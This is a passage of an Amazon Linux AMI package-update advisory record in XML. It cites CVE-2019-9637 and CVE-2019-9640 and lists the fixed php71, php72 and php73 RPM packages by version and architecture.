</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9637" title="" id="CVE-2019-9637" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9640" title="" id="CVE-2019-9640" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-debuginfo" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.27" release="1.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.27-1.37.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.27" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.27-1.37.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-tidy" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.16" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.4" release="1.14.amzn1" epoch="0" 